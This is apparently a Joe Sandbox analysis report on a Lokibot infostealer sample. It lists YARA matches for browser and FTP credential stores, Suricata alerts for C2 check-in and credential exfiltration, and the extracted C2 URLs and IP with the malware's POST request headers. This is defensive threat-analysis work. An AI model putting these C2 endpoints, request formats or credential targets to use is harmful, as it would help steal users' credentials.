1.2.Mcx2Xk0fqn.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Mcx2Xk0fqn.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x33cb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2107c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x30675:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x308bd:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2f8c0:$des3: 68 03 66 00 00 0x33cb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x33d7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x32df7:$f1: FileZilla\recentservers.xml 0x32e37:$f2: FileZilla\sitemanager.xml 0x310a7:$b2: Mozilla\Firefox\Profiles 0x30e11:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x30fbb:$s4: logins.json 0x31e65:$s6: wand.dat 0x308e5:$a1: username_value 0x308d5:$a2: password_value 0x30f20:$a3: encryptedUsername 0x30f8d:$a3: encryptedUsername 0x30f33:$a4: encryptedPassword 0x30fa1:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x33cb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2107c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x30675:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x308bd:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2f8c0:$des3: 68 03 66 00 00 0x33cb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x33d7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x32df7:$f1: FileZilla\recentservers.xml 0x32e37:$f2: FileZilla\sitemanager.xml 0x310a7:$b2: Mozilla\Firefox\Profiles 0x30e11:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x30fbb:$s4: logins.json 0x31e65:$s6: wand.dat 0x308e5:$a1: username_value 0x308d5:$a2: password_value 0x30f20:$a3: encryptedUsername 0x30f8d:$a3: encryptedUsername 0x30f33:$a4: encryptedPassword 0x30fa1:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x33cb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x2107c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x30675:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x308bd:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2f8c0:$des3: 68 03 66 00 00 0x33cb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x33d7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x32df7:$f1: FileZilla\recentservers.xml 0x32e37:$f2: FileZilla\sitemanager.xml 0x310a7:$b2: Mozilla\Firefox\Profiles 0x30e11:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x30fbb:$s4: logins.json 0x31e65:$s6: wand.dat 0x308e5:$a1: username_value 0x308d5:$a2: password_value 0x30f20:$a3: encryptedUsername 0x30f8d:$a3: encryptedUsername 0x30f33:$a4: encryptedPassword 0x30fa1:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x30eb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1e27c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x30eb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	Loki_1	Loki Payload	kevoreilly	0x2d875:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x2dabd:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x30eb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1e27c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2cac0:$des3: 68 03 66 00 00 0x30eb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x30f7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2fff7:$f1: FileZilla\recentservers.xml 0x30037:$f2: FileZilla\sitemanager.xml 0x2e2a7:$b2: Mozilla\Firefox\Profiles 0x2e011:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2e1bb:$s4: logins.json 0x2f065:$s6: wand.dat 0x2dae5:$a1: username_value 0x2dad5:$a2: password_value 0x2e120:$a3: encryptedUsername 0x2e18d:$a3: encryptedUsername 0x2e133:$a4: encryptedPassword 0x2e1a1:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	Loki_1	Loki Payload	kevoreilly	0x2d875:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x2dabd:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2cac0:$des3: 68 03 66 00 00 0x30eb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x30f7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2fff7:$f1: FileZilla\recentservers.xml 0x30037:$f2: FileZilla\sitemanager.xml 0x2e2a7:$b2: Mozilla\Firefox\Profiles 0x2e011:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2e1bb:$s4: logins.json 0x2f065:$s6: wand.dat 0x2dae5:$a1: username_value 0x2dad5:$a2: password_value 0x2e120:$a3: encryptedUsername 0x2e18d:$a3: encryptedUsername 0x2e133:$a4: encryptedPassword 0x2e1a1:$a4: encryptedPassword
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1e27c:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	Loki_1	Loki Payload	kevoreilly	0x2d875:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x2dabd:$a2: last_compatible_version
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2cac0:$des3: 68 03 66 00 00 0x30eb1:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x30f7d:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2fff7:$f1: FileZilla\recentservers.xml 0x30037:$f2: FileZilla\sitemanager.xml 0x2e2a7:$b2: Mozilla\Firefox\Profiles 0x2e011:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2e1bb:$s4: logins.json 0x2f065:$s6: wand.dat 0x2dae5:$a1: username_value 0x2dad5:$a2: password_value 0x2e120:$a3: encryptedUsername 0x2e18d:$a3: encryptedUsername 0x2e133:$a4: encryptedPassword 0x2e1a1:$a4: encryptedPassword
Click to see the 111 entries

Suricata Signatures

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:57.355228+0200
SID:	2021641
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:57.355228+0200
SID:	2025381
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:57.355228+0200
SID:	2825766
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.159945+0200
SID:	2021641
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.159945+0200
SID:	2025381
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.159945+0200
SID:	2825766
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.011635+0200
SID:	2024313
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.011635+0200
SID:	2024318
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:56.116406+0200
SID:	2024312
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:57.290515+0200
SID:	2024312
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:56.627184+0200
SID:	2021641
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:56.627184+0200
SID:	2025381
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:56.627184+0200
SID:	2825766
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.794071+0200
SID:	2024313
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:58.794071+0200
SID:	2024318
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:55.466017+0200
SID:	2021641
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:55.466017+0200
SID:	2025381
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 89.34.237.212

Timestamp:	2024-08-30T08:11:55.466017+0200
SID:	2825766
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mcx2Xk0fqn.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://89.34.237.212/annonymous/fre.php"]}

Multi AV Scanner detection for domain / URL

Source: http://89.34.237.212/annonymous/fre.php

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Source: Mcx2Xk0fqn.exe	ReversingLabs: Detection: 76%
Source: Mcx2Xk0fqn.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Mcx2Xk0fqn.exe

Joe Sandbox ML: detected

Source: Mcx2Xk0fqn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: Mcx2Xk0fqn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

1_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 89.34.237.212:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 89.34.237.212:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://89.34.237.212/annonymous/fre.php

Source: Joe Sandbox View

ASN Name: ASSEFLOWAmsterdamInternetExchangeAMS-IXIT ASSEFLOWAmsterdamInternetExchangeAMS-IXIT

Source: global traffic	HTTP traffic detected: POST /annonymous/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 89.34.237.212Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E06B0B08Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /annonymous/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 89.34.237.212Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E06B0B08Content-Length: 176Connection: close
